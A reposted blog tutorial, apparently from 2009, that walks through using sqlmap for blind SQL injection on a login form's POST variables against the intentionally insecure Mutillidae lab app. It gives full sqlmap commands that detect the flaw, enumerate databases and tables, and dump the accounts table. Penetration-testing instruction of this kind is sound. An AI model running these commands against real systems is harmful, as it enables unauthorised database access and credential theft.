SQLMap: Blind SQL injection untuk POST vars
Sumber: http://www.omgsecurity.com/2009/06/blind-sql-injection-of-post-vars-with-sqlmap/
There are many How-To’s on SQL injection, but I thought I would add to the list with a quick tutorial on how to use SQLmap to automate blind SQLinjection on form POST variables. Most of the tutorials focus on injecting on GET variables within the URL.
List of tools used for this demonstration (configuration of these tools is outside the scope of this tutorial)
Running on Target System
XAMPP (All-in-one Web Server and Database Server with PHP) Mutillidae (Purposely insecure PHP site created by Irongeek)
Running on Attacker’s System
Backtrack 4 Beta (Linux Distro for Pentesters) ParosProxy (Web proxy program for examining web traffic) Installed on Backtrack 4 SQLmap 0.6-rc5 (Automated SQL injection program) Installed on Backtrack 4
- Before you begin make sure you have ParosProxy running and your web browser pointing to it**
The first thing we do is browse to the site. I will be testing the login form on the login.php page.
img1
Before we login, lets look at the source code for the login form.
img2
As you can see there are three input variables: user_name, password, and submit_button.
We also notice the method is POST (which is why we are using it for this example).
Now you can login. I will use the admin account to login. You could use any account though.
Username: admin
Password: adminpass
It isn’t really that necessary to log into the site, but I want to show you the POST variables as they are passed to the server within ParosProxy. Also, for this particular exercise, you will have to provide a valid username and password for the injection to work correctly in SQLmap. So, you might as well make sure it works. Again you don’t have to use the admin account, you could even register a user first and then use that account.
img3
And the page that tells me I have logged in successfully.
img4
Ok, now the we have successfully logged into the site, lets check Paros to see how that data was sent via the POST method.
img5
As you can see the format of the post variables is as follows: user_name=admin&password=adminpass&Submit_button=Submit OK, now fireup sqlmap from a terminal. To make sqlmap check POST variables you need to specify the --method "POST" switch followed by the --data switch.
Here is the whole command for this example (notice how the POST data from Paros is supplied directly to the “–data” switch): python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" img6
It worked. sqlmap detected the remote database server is MySQL ver. 5.X.X
That is pretty much it, but just for fun lets enumerate some of the data. Lets check to see who the current user is: python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --current-user img7
Alright! running as root…that is convenient. Let’s see the databases: python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --dbs img8
OK, lets check out “owasp10″ since that is the database for the mutillidae website: python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --tables -D owasp10 img9
Ooo…the “accounts” table looks interesting let’s get the data: python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" -D owasp10 -T accounts --dump img10
Well there you have it. I hope you have found some of this tutorial interesting. And perhaps if you were curious on how to perform automated blind sqlinjection on POST variables, this sheds a little light on it.